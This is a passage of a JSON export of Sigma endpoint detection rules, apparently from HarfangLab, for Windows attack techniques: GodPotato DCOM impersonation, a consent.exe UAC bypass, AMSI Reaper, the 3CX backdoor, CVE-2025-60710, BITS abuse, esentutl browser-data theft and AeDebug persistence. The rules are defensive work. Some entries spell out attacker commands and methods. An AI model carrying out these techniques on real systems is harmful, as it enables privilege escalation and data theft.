"hl_testing_start_time": "2026-03-23T11:45:34.072734Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BeichenDream/GodPotato",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_suspicious_process_via_dcom.yml",
"content": "title: Suspicious Process Launched via DCOM\nid: 23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5\ndescription: |\n Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\n The GodPotato hacktool is known to use this method.\n It is recommended to investigate the launched process to determine its legitimacy.\nreferences:\n - https://github.com/BeichenDream/GodPotato\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/10/27\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'seclogon'\n UserSID: 'S-1-5-20'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5",
"rule_name": "Suspicious Process Launched via DCOM",
"rule_description": "Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\nThe GodPotato hacktool is known to use this method.\nIt is recommended to investigate the launched process to determine its legitimacy.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093309Z",
"creation_date": "2026-03-23T11:45:34.093311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093316Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_consent.yml",
"content": "title: UAC Bypass Executed via consent\nid: 23ec89c2-af05-41a4-aa3a-a08516d8e33c\ndescription: |\n Detects an unsigned DLL being loaded by consent.exe.\n This may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\n Windows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\consent.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\consent.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c",
"rule_name": "UAC Bypass Executed via consent",
"rule_description": "Detects an unsigned DLL being loaded by consent.exe.\nThis may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\nWindows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "240337a9-d676-4c03-b22e-8f7efcef8f2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086779Z",
"creation_date": "2026-03-23T11:45:34.086781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/h0ru/AMSI-Reaper",
"https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_amsi_reaper_powershell.yml",
"content": "title: PowerShell AMSI Reaper Executed\nid: 240337a9-d676-4c03-b22e-8f7efcef8f2d\ndescription: |\n Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\n This tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\n It is recommended to analyze the process executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\nreferences:\n - https://github.com/h0ru/AMSI-Reaper\n - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/02/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.AMSIReaper\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_name:\n PowershellCommand|contains: 'AMSIReaper'\n\n selection_amsi:\n PowershellCommand|contains|all:\n - 'AmsiOpenSession'\n - 'amsi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "240337a9-d676-4c03-b22e-8f7efcef8f2d",
"rule_name": "PowerShell AMSI Reaper Executed",
"rule_description": "Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\nThis tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\nIt is recommended to analyze the process executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\n",
"rule_creation_date": "2024-02-07",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24117cea-8f26-491f-a109-aa3ea8e9fc04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604215Z",
"creation_date": "2026-03-23T11:45:34.604218Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604225Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
"https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_3cx_github_dns.yml",
"content": "title: Backdoored 3CXDesktopApp Github Communication Detected\nid: 24117cea-8f26-491f-a109-aa3ea8e9fc04\ndescription: |\n Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\n The backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\n It is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - attack.command_and_control\n - attack.t1102\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'github.com'\n - 'raw.githubusercontent.com'\n ProcessOriginalFileName: '3CXDesktopApp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24117cea-8f26-491f-a109-aa3ea8e9fc04",
"rule_name": "Backdoored 3CXDesktopApp Github Communication Detected",
"rule_description": "Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\nThe backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\nIt is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\n",
"rule_creation_date": "2023-03-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102",
"attack.t1195.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "244d41bc-5373-4c23-8781-b57d4dd31e2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604446Z",
"creation_date": "2026-03-23T11:45:34.604449Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604457Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Wh04m1001/CVE-2025-60710",
"https://nvd.nist.gov/vuln/detail/CVE-2025-60710",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "cve_2025_60710_windows_recall.yml",
"content": "title: CVE-2025-60710 Windows Recall Privilege Escalation\nid: 244d41bc-5373-4c23-8781-b57d4dd31e2d\ndescription: |\n Detects file manipulation associated with CVE-2025-60710.\n CVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\n A low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\n The task’s multiple triggers let an attacker reliably invoke the deletion.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://github.com/Wh04m1001/CVE-2025-60710\n - https://nvd.nist.gov/vuln/detail/CVE-2025-60710\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/11/14\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2025-60710\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Recall\n - classification.Windows.Exploit.CVE-2025-60710\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_rename\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\CoreAIPlatform.00\\UKP\\{????????-????-????-????-????????????}'\n TargetPath|startswith: '?:\\Windows'\n\n filter_system:\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_system\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "244d41bc-5373-4c23-8781-b57d4dd31e2d",
"rule_name": "CVE-2025-60710 Windows Recall Privilege Escalation",
"rule_description": "Detects file manipulation associated with CVE-2025-60710.\nCVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\nA low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\nThe task’s multiple triggers let an attacker reliably invoke the deletion.\nIt is recommended to check the related process for suspicious activities.\n",
"rule_creation_date": "2025-11-14",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24693ed1-f629-47e5-bb5e-0ce442188fe9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071195Z",
"creation_date": "2026-03-23T11:45:34.071197Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager",
"https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_suspicious_binary_launched_by_bits.yml",
"content": "title: Suspicious Binary Launched via BITS\nid: 24693ed1-f629-47e5-bb5e-0ce442188fe9\ndescription: |\n Detects execution of suspicious binary launched by BITS.\n This is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\n This method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n It is recommended to investigate the created process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager\n - https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/07/30\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS\n ParentImage|endswith: '\\svchost.exe'\n ParentCommandLine|contains: ' BITS'\n\n exclusion_bits:\n CommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n ParentCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_directxdatabaseupdater.exe:\n # C:\\Windows\\System32\\directxdatabaseupdater.exe\n Image|endswith: '\\directxdatabaseupdater.exe'\n OriginalFileName: 'DirectXDatabaseUpdater.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_mcafee:\n # McAfee WebAdvisor(bootstrap installer) (SaBsi module)\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_yandex:\n Image|endswith: '\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Signed: 'true'\n ProcessSignature: 'YANDEX LLC'\n\n exclusion_opera_setup:\n Image|endswith: '\\OperaSetup.exe'\n Signed: 'true'\n Signature: 'Opera Norway AS'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24693ed1-f629-47e5-bb5e-0ce442188fe9",
"rule_name": "Suspicious Binary Launched via BITS",
"rule_description": "Detects execution of suspicious binary launched by BITS.\nThis is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\nThis method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nIt is recommended to investigate the created process for suspicious activities.\n",
"rule_creation_date": "2021-07-30",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "248a91c7-af38-4792-8ffb-942e6e7ce41b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611456Z",
"creation_date": "2026-03-23T11:45:34.611459Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611466Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_suspicious_browser_data_theft.yml",
"content": "title: Possible Browser Data Theft via Esentutl\nid: 248a91c7-af38-4792-8ffb-942e6e7ce41b\ndescription: |\n Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\n The Qakbot malware is known to use this technique to steal sensitive information.\n It is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/04/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\esentutl.exe'\n # esentutl.exe /r V01 /lC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /sC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /dC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache\n CommandLine|contains|all:\n - 'esentutl.exe'\n - ' /r V01 '\n - ' /l'\n - ' /s'\n - ' /d'\n - '\\AppData\\Local\\Microsoft\\Windows\\WebCache'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "248a91c7-af38-4792-8ffb-942e6e7ce41b",
"rule_name": "Possible Browser Data Theft via Esentutl",
"rule_description": "Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\nThe Qakbot malware is known to use this technique to steal sensitive information.\nIt is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "24914a2f-f501-410c-8f63-d70ae6a01f4d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617329Z",
"creation_date": "2026-03-23T11:45:34.617331Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617335Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/aedebug.html",
"https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_aedebug.yml",
"content": "title: Possible AeDebug Persistence Added\nid: 24914a2f-f501-410c-8f63-d70ae6a01f4d\ndescription: |\n Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\n Attackers can set this registry value to point to a malicious payload to achieve persistence.\n It is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\nreferences:\n - https://persistence-info.github.io/Data/aedebug.html\n - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_debuggers:\n Details|contains:\n - 'windbg.exe'\n - 'vsjitdebugger.exe'\n\n exclusion_piksels_digital_signage_debug:\n ProcessImage: '?:\\Program Files\\Digital signage ??\\kspAdminService.exe'\n Details|contains: '?:\\Program Files\\Digital signage 11\\ntsd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "24914a2f-f501-410c-8f63-d70ae6a01f4d",
"rule_name": "Possible AeDebug Persistence Added",
"rule_description": "Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\nAttackers can set this registry value to point to a malicious payload to achieve persistence.\nIt is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "249d762f-c5a2-406d-acf3-071a10d93210",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297021Z",
"creation_date": "2026-03-23T11:45:35.297023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297028Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/defense-evasion/T1070.002/",
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_system_logs_removed_cli_linux.yml",
